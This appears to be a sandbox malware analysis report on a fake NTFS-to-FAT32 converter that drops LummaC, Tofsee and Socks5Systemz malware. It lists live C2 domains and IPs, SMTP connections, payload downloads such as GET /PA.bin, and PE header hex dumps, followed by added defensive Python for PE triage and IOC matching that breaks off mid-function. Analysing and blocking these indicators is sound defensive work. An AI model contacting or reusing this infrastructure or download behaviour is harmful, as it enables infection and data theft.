2025-04-15T17:04:25.364741+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49742 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:26.577262+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49744 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:27.742805+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49745 | 185.39.17.76 | 443 | TCP

AV Detection

Source: C:\ProgramData\NTFS2FAT32Converter\NTFS2FAT32Converter.exe | Avira: detection malicious, Label: HEUR/AGEN.1314980
Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Avira: detection malicious, Label: HEUR/AGEN.1314980
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["proenhann.digital/thnb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "609a3af8f2b5fbb695363717b3ddf4a67885df"}
Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack | Malware Configuration Extractor: Tofsee {"C2 list": ["quag.cn:443", "jotunheim.name:443"]}
Source: ntfs2fat32converter102.exe.8920.5.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["185.39.17.76"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\UNIQTHREE[1].file | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\is-4R09J.tmp | ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\user32_8.drv (copy) | ReversingLabs: Detection: 28%
Source: nK8noQeiXl.exe | Virustotal: Detection: 38%
Source: nK8noQeiXl.exe | ReversingLabs: Detection: 55%
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: proenhann.digital/thnb
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: jawdedmirror.run/ewqd
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: changeaie.top/geps
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lonfgshadow.live/xawi
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: liftally.top/xasj
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: nighetwhisper.top/lekd
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: salaccgfa.top/gsooz
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: zestmodp.top/zeda
Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | String decryptor: owlflright.digital/qopy
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,4_2_0045D4EC
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_0045D5A0 ArcFourCrypt,4_2_0045D5A0
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_0045D5B8 ArcFourCrypt,4_2_0045D5B8
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_10001000 ISCryptGetVersion,4_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_10001130 ArcFourCrypt,4_2_10001130

Phishing

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe, type: DROPPED

Compliance

Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Unpacked PE file: 0.2.nK8noQeiXl.exe.3430000.0.unpack
Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Unpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack
Source: nK8noQeiXl.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NTFS to FAT32 Converter_is1
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.39.17.76:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.21:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Code function: 1_2_100081AE FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_00452A4C FindFirstFileA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_004751F8 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_00462ABC FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 194.87.98.18 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 67.195.204.77 25
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 52.101.41.22 25
Source: Malware configuration extractor | URLs: proenhann.digital/thnb
Source: Malware configuration extractor | URLs: jawdedmirror.run/ewqd
Source: Malware configuration extractor | URLs: changeaie.top/geps
Source: Malware configuration extractor | URLs: lonfgshadow.live/xawi
Source: Malware configuration extractor | URLs: liftally.top/xasj
Source: Malware configuration extractor | URLs: nighetwhisper.top/lekd
Source: Malware configuration extractor | URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor | URLs: zestmodp.top/zeda
Source: Malware configuration extractor | URLs: owlflright.digital/qopy
Source: Malware configuration extractor | URLs: 185.39.17.76
Source: Malware configuration extractor | URLs: quag.cn:443
Source: Malware configuration extractor | URLs: jotunheim.name:443
Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe | File created: 5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe.13.dr
Source: global traffic | TCP traffic: 192.168.2.5:49722 -> 62.210.201.223:2024
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQTWO.file";Content-Length: 3719914Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 
00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 b4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:46 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQTHREE.file";Content-Length: 2558840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 b4 46 f5 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 54 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 50 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 2c 33 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 
60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 2c 33 01 00 00 10 02 00 00 34 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:55 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQ.file";Content-Length: 9061906Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f f0 68 44 3b 91 06 17 3b 91 06 17 3b 91 06 17 1c 57 6b 17 36 91 06 17 86 de 90 17 3a 91 06 17 32 e9 93 17 1c 91 06 17 32 e9 85 17 80 91 06 17 32 e9 82 17 f8 91 06 17 25 c3 82 17 32 91 06 17 1c 57 68 17 3a 91 06 17 1c 57 7d 17 14 91 06 17 3b 91 07 17 2e 92 06 17 32 e9 8c 17 56 90 06 17 25 c3 92 17 3a 91 06 17 32 e9 97 17 3a 91 06 17 52 69 63 68 3b 91 06 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 99 7b 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2c 23 00 00 7e 12 00 00 00 00 00 63 b4 1c 00 00 10 00 00 00 40 23 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 3a 00 00 04 00 00 46 33 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 49 2b 00 e0 01 00 00 00 70 2c 00 00 0c 0e 00 00 00 00 00 00 00 00 00 0a 15 8a 00 08 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 eb 26 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 23 00 ac 09 00 00 18 49 2b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6b 2a 23 00 00 10 00 00 00 2c 23 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 
00 a8 3d 08 00 00 40 23 00 00 3e 08 00 00 30 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 e5 00 00 00 80 2b 00 00 6a 00 00 00 6e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 0c 0e 00 00 70 2c 00 00 0c 0e 00 00 d8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
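The three HTTP responses above are served as attachments named UNIQTWO.file, UNIQTHREE.file and UNIQ.file, but their Data Raw bytes are what matter: each starts with a DOS header followed by a PE header. The Python below is an added example and is not part of the Joe Sandbox report. It reconstructs the first 0x11c bytes of the UNIQTWO.file response (DOS header, stub and PE/COFF header copied from the dump; the zero padding between stub and PE signature is built from e_lfanew rather than copied byte for byte) and reads the fields an analyst checks first: the "MZP" stub, the e_lfanew target, Machine, the section count, the linker timestamp, the optional-header magic and the Characteristics flags. On this header it reports the fixed Borland timestamp 0x2A425E19 and linker version 2.25, which together with the CODE/DATA/BSS section names visible in the same dump mark a Delphi-built image, consistent with the Inno Setup temp path (is-GHU9V.tmp) and ISCrypt exports seen elsewhere on this page.

```python
"""Check that a downloaded "*.file" attachment really is a PE and read its triage fields.

Added example; not part of the Joe Sandbox report. DOS_HEADER_AND_STUB and
PE_HEADER are copied from the report's first Data Raw dump (the UNIQTWO.file
response). The zero padding between the stub and the PE signature is built
here from e_lfanew instead of being copied, so SAMPLE is a reconstruction of
the first 0x11c bytes of that response.
"""
import re
import struct

DOS_HEADER_AND_STUB = bytes.fromhex(
    "4d5a5000" "02000000" "04000f00" "ffff0000"  # "MZ", e_cblp=0x50: the "MZP" of Borland-built files
    "b8000000" "00000000" "40001a00" "00000000"
    "00000000" "00000000" "00000000" "00000000"
    "00000000" "00000000" "00000000" "00010000"  # e_lfanew = 0x100
    "ba10000e" "1fb409cd" "21b8014c" "cd219090"  # 16-bit stub: print the message, exit via int 21h
) + b"This program must be run under Win32\r\n$7"

PE_HEADER = bytes.fromhex(
    "50450000"             # "PE\0\0"
    "4c010800"             # Machine 0x14c (i386), NumberOfSections 8
    "195e422a"             # TimeDateStamp 0x2a425e19
    "00000000" "00000000"  # PointerToSymbolTable, NumberOfSymbols
    "e0008f81"             # SizeOfOptionalHeader 0xe0, Characteristics 0x818f
    "0b010219"             # Optional header: Magic 0x10b (PE32), linker 2.25
)

E_LFANEW = struct.unpack_from("<I", DOS_HEADER_AND_STUB, 0x3C)[0]
# Constructed padding: the dump shows zeros here, but they are not copied byte for byte.
SAMPLE = DOS_HEADER_AND_STUB + b"\x00" * (E_LFANEW - len(DOS_HEADER_AND_STUB)) + PE_HEADER

DELPHI_FIXED_TIMESTAMP = 0x2A425E19  # constant TimeDateStamp written by older Borland linkers
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED", 0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}


def triage_pe(data: bytes) -> dict:
    """Parse the DOS header, stub message and the start of the COFF/optional header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image (an expired download link usually returns HTML here)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%x" % e_lfanew)
    machine, nsections, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, e_lfanew + 24)
    stub = re.search(rb"This program[ -~]*", data[0x40:e_lfanew])
    return {
        "mzp_stub": data[2:3] == b"P",
        "stub_message": stub.group(0).decode("ascii") if stub else "",
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": nsections,
        "timestamp": stamp,
        "delphi_fixed_timestamp": stamp == DELPHI_FIXED_TIMESTAMP,
        "optional_header_size": opt_size,
        "pe32_plus": magic == 0x20B,
        "linker_version": (linker_major, linker_minor),
        "characteristics": [name for bit, name in sorted(CHARACTERISTICS.items()) if chars & bit],
    }


def is_pe(data: bytes) -> bool:
    """True when the bytes parse as a PE image, False for HTML error pages and other junk."""
    try:
        triage_pe(data)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    for key, value in triage_pe(SAMPLE).items():
        print(f"{key:24} {value}")
```

Pointing the same function at the UNIQ.file dump would give NumberOfSections 4 and TimeDateStamp 0x66957b99; that dump also carries a Rich header, so it was produced by Microsoft's linker rather than Borland's. The is_pe check is the one to put in front of any automated download-and-detonate step: when a dropper's link has expired the server often answers with an HTML page that still gets saved under the .exe name, and the MZ check rejects it before it is treated as a binary.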
Source: global traffic | HTTP traffic detected: GET /PA.bin HTTP/1.1 | Connection: Keep-Alive | Host: h1.passionwhenever.shop
Source: Joe Sandbox View | IP Address: 185.156.73.98
Source: Joe Sandbox View | IP Address: 67.195.204.77
Source: Joe Sandbox View | ASN Name: MTW-ASRU
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
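The rows above carry the network indicators an operator would block or hunt for: the Network Connect rows for regsvr32.exe, the malware configuration extractor URLs, the TCP traffic row to 62.210.201.223:2024 and the Host header of the GET /PA.bin request. The Python below is an added example, not part of the report. It parses report rows of exactly those shapes into an IOC set (domains, IPs, IP:port pairs and URL paths) and matches that set against a few log lines. The report rows are copied from this page (the cell separator does not matter, the parser keys on the row labels); the DNS and connection log lines are constructed for the demonstration.

```python
"""Build an IOC set from Joe Sandbox networking rows and match it against log lines.

Added example, not part of the report. REPORT_ROWS are copied from the
Networking section of this report; LOG_LINES are constructed for the demo.
"""
import ipaddress
import re
from urllib.parse import urlsplit

REPORT_ROWS = [
    "Source: C:\\Windows\\SysWOW64\\regsvr32.exe | Network Connect: 194.87.98.18 443",
    "Source: C:\\Windows\\SysWOW64\\regsvr32.exe | Network Connect: 67.195.204.77 25",
    "Source: C:\\Windows\\SysWOW64\\regsvr32.exe | Network Connect: 52.101.41.22 25",
    "Source: Malware configuration extractor | URLs: proenhann.digital/thnb",
    "Source: Malware configuration extractor | URLs: jawdedmirror.run/ewqd",
    "Source: Malware configuration extractor | URLs: changeaie.top/geps",
    "Source: Malware configuration extractor | URLs: lonfgshadow.live/xawi",
    "Source: Malware configuration extractor | URLs: liftally.top/xasj",
    "Source: Malware configuration extractor | URLs: nighetwhisper.top/lekd",
    "Source: Malware configuration extractor | URLs: salaccgfa.top/gsooz",
    "Source: Malware configuration extractor | URLs: zestmodp.top/zeda",
    "Source: Malware configuration extractor | URLs: owlflright.digital/qopy",
    "Source: Malware configuration extractor | URLs: 185.39.17.76",
    "Source: Malware configuration extractor | URLs: quag.cn:443",
    "Source: Malware configuration extractor | URLs: jotunheim.name:443",
    "Source: global traffic | TCP traffic: 192.168.2.5:49722 -> 62.210.201.223:2024",
    "Source: global traffic | HTTP traffic detected: GET /PA.bin HTTP/1.1 Host: h1.passionwhenever.shop",
]

# Constructed log lines (DNS answers and connection records); not taken from the report.
LOG_LINES = [
    "2025-04-15T15:02:38Z dns  192.168.2.5 A proenhann.digital",
    "2025-04-15T15:02:40Z conn 192.168.2.5 -> 185.39.17.76:443 tls",
    "2025-04-15T15:02:46Z conn 192.168.2.5 -> 67.195.204.77:25 smtp",
    "2025-04-15T15:02:50Z dns  192.168.2.5 A h1.passionwhenever.shop",
    "2025-04-15T15:02:55Z dns  192.168.2.5 A www.example.com",
    "2025-04-15T15:03:01Z conn 192.168.2.5 -> 52.101.41.22:587 smtp",
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
CONFIG_URL_RE = re.compile(r"URLs:\s*(\S+)")
CONNECT_RE = re.compile(r"Network Connect:\s*(" + IPV4 + r")\s+(\d+)")
TCP_RE = re.compile(r"TCP traffic:\s*\S+\s*->\s*(" + IPV4 + r"):(\d+)")
HOST_RE = re.compile(r"Host:\s*([A-Za-z0-9.-]+)")
IP_PORT_RE = re.compile(r"\b(" + IPV4 + r")(?::(\d+))?")
HOSTNAME_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)


def _is_ip(text: str) -> bool:
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def _add_host(iocs: dict, host: str, port=None) -> None:
    """File a host as an IP (with its port, when observed) or as a domain."""
    if _is_ip(host):
        iocs["ips"].add(host)
        if port is not None:
            iocs["ip_ports"].add((host, int(port)))
    else:
        iocs["domains"].add(host.lower())


def extract_iocs(rows) -> dict:
    """Parse config-extractor URL, Network Connect, TCP traffic and Host rows."""
    iocs = {"domains": set(), "ips": set(), "ip_ports": set(), "paths": set()}
    for row in rows:
        m = CONFIG_URL_RE.search(row)
        if m:
            parts = urlsplit("//" + m.group(1))  # host[:port][/path] without a scheme
            _add_host(iocs, parts.hostname, parts.port)
            if parts.path:
                iocs["paths"].add((parts.hostname, parts.path))
        for ip, port in CONNECT_RE.findall(row) + TCP_RE.findall(row):
            _add_host(iocs, ip, port)
        for host in HOST_RE.findall(row):
            _add_host(iocs, host)
    return iocs


def match_line(line: str, iocs: dict) -> list:
    """Return the sorted indicators from `iocs` that occur in one log line."""
    hits = set()
    for ip, port in IP_PORT_RE.findall(line):
        if ip in iocs["ips"]:
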